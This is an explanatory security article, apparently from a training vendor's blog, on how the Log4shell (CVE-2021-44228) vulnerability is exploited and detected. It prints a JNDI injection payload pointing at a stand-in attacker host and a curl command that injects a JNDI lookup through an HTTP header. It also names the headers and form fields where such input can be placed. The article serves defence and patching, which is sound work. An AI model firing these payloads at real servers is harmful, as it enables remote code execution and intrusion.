How criminals are taking advantage of Log4shell vulnerability
Log4shell is a vulnerability found in Apache Log4j 2 library used for logging error messages in Java-based applications. The fault is tracked as CVE-2021-44228 and, when successfully exploited, a remote hacker can take complete control of a device over the Internet.
Learn Vulnerability Management
Log4j is the most popular Java logging library around the globe, with over 400k downloads on GitHub. Major giant tech firms, such as Apple, Tencent, Steam, Twitter, Google, Amazon, and Tesla, use this vulnerable library and are now on the cybercriminals’ radar.
Figure 1: Log4shell exploitation worldwide (by ESET).
How the Log4shell vulnerability works
Here is the modus operandi of the Log4shell vulnerability:
- The data from the user is sent to the remote server via any protocol.
- The server logs the requested data, which includes the malicious payload:
${jndi:ldap://attacker.example.com/payload1}- The pre-computed payload, which is available on the domain controlled by the attacker (attacker.example.com), activates the log4j vulnerability in the remote server that sends a request to the attacker domain via the Java naming and directory interface (JNDI) protocol.
- From this point, the attacker can control the response and include a URL to a remote Java class file (http:/attacker.example.com/payload2.class) that will be injected into the server process.
- The second stage (payload2) is triggered by the injected payload, which allows an attacker to execute arbitrary code (e.g., a remote shell).
The high-level diagram of this vulnerability is presented in Figure 2 below.
Figure 2: High-level diagram of Log4shell vulnerability.
Hackers can test if the vulnerability exists and whether it can even be exploited at any input point where the external user is allowed to enter data. Among those points are input fields, user and password login forms, HTTP headers such as User-Agent, X-Forwarded-For, or other custom headers. In the example illustrated in Figure 2 above, we highlighted the user-agent HTTP header as an example.
How criminals are exploiting Log4shell
This vulnerability is being actively exploited in the wild by cybercriminals. It is a remote code execution (RCE) flaw, one of the most dangerous vulnerability types because it allows remote attackers to fully control servers over the Internet. From a 360º perspective, it was established that cybercriminals focus on installing cryptocurrency mining and, more recently, installing Cobalt Strike for credential theft, lateral movement, and data exfiltration from compromised systems. Finally, the deployment of ransomware has been noticed as the last stage of the malicious chain.
Figure 3: Conti Ransomware Log4Shell Operation.
Learn Vulnerability Management
Final thoughts and recommendations on the Log4shell vulnerability
Log4shell vulnerability is a severe vulnerability that can impact several organizations worldwide. Criminals can take advantage of this flaw to gain access to the companies’ internal assets and put the entire company's secrets and infrastructure at risk – for instance, by stealing their data and deploying a ransomware attack.
In order to prevent these kinds of scenarios, patches to meditate this vulnerability should be applied, depending on the affected version. In addition, the flaw can be easily detected by using a specially crafted payload.
curl target_server:port -H 'X-Api-Version: ${jndi:ldap://x${hostName}.L4J.<RANDOM_STRING>.canarytokens.com/a}'
Sources:
- log4shell initial access, advintel
- Log4shell explanation, UpGuard
- What is Log4shell, Dynatrace
Learn Vulnerability Management
Build your vulnerability assessment and management skills with dozens of courses. What you'll learn- Vulnerability scanning
- Classifying and prioritizing
- Patching and mitigating
- Building a program
- And more
In this Series
- How criminals are taking advantage of Log4shell vulnerability
- The most popular binary exploitation techniques
- Roadmap for performing an Active Directory assessment
- The importance of asset visibility in the detection and remediation of vulnerabilities
- Digium Phones Under Attack and how web shells can be really dangerous
- vSingle is abusing GitHub to communicate with the C2 server
- The most dangerous vulnerabilities exploited in 2022
- Follina — Microsoft Office code execution vulnerability
- Spring4Shell vulnerability details and mitigations
- Microsoft Autodiscover protocol leaking credentials: How it works
- How to write a vulnerability report
- How to report a security vulnerability to an organization
- PrintNightmare CVE vulnerability walkthrough
- Top 30 most exploited software vulnerabilities being used today
- The real dangers of vulnerable IoT devices
- How criminals leverage a Firefox fake extension to target Gmail accounts
- How criminals have abused a Microsoft Exchange flaw in the wild
- How to discover open RDP ports with Shodan
- Time to patch: Vulnerabilities exploited in under five minutes?
- Whitespace obfuscation: PHP malware, web shells and steganography
- New Sudo flaw used to root on any standard Linux installation
- Turla Crutch backdoor: analysis and recommendations
- Volodya/BuggiCorp Windows exploit developer: What you need to know
- AWS APIs abuse: Watch out for these vulnerable APIs
- How to reserve a CVE: From vulnerability discovery to disclosure
- SonicWall firewall VPN vulnerability (CVE-2020-5135): Overview and technical walkthrough
- Top 25 vulnerabilities exploited by Chinese nation-state hackers (NSA advisory)
- Zerologon CVE-2020-1472: Technical overview and walkthrough
- Unpatched address bar spoofing vulnerability impacts major mobile browsers
- Software vulnerability patching best practices: Patch everything, even if vendors downplay risks
- What is a vulnerability disclosure policy (VDP)?
- Common vulnerability assessment types
- Common security threats discovered through vulnerability assessments
- Android vulnerability allows attackers to spoof any phone number
- Malicious Docker images: How to detect vulnerabilities and mitigate risk
- Apache Guacamole Remote Desktop Protocol (RDP) vulnerabilities: What you need to know
- Linux vulnerabilities: How unpatched servers lead to persistent backdoors
- Tesla Model 3 vulnerability: What you need to know about the web browser bug
- How to identify and prevent firmware vulnerabilities
- Will CVSS v3 change everything? Understanding the new glossary
- URGENT/11 vulnerability
- 32 hardware and firmware vulnerabilities
- The Zero Day Initiative
- CVE-2018-11776 RCE Flaw in Apache Struts Could Be Root Cause of Clamorous Hacks
- XML vulnerabilities are still attractive targets for attackers
- Broadpwn Wi-Fi Vulnerability: How to Detect & Mitigate
- Mobile Systems Vulnerabilities
- 10 Security Vulnerabilities That Broke the World Wide Web in 2016
- Most Exploited Vulnerabilities: by Whom, When, and How
- Exploiting CVE-2015-8562 (A New Joomla! RCE)
- Security vulnerabilities of voice recognition technologies
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Vulnerabilities
Vulnerabilities
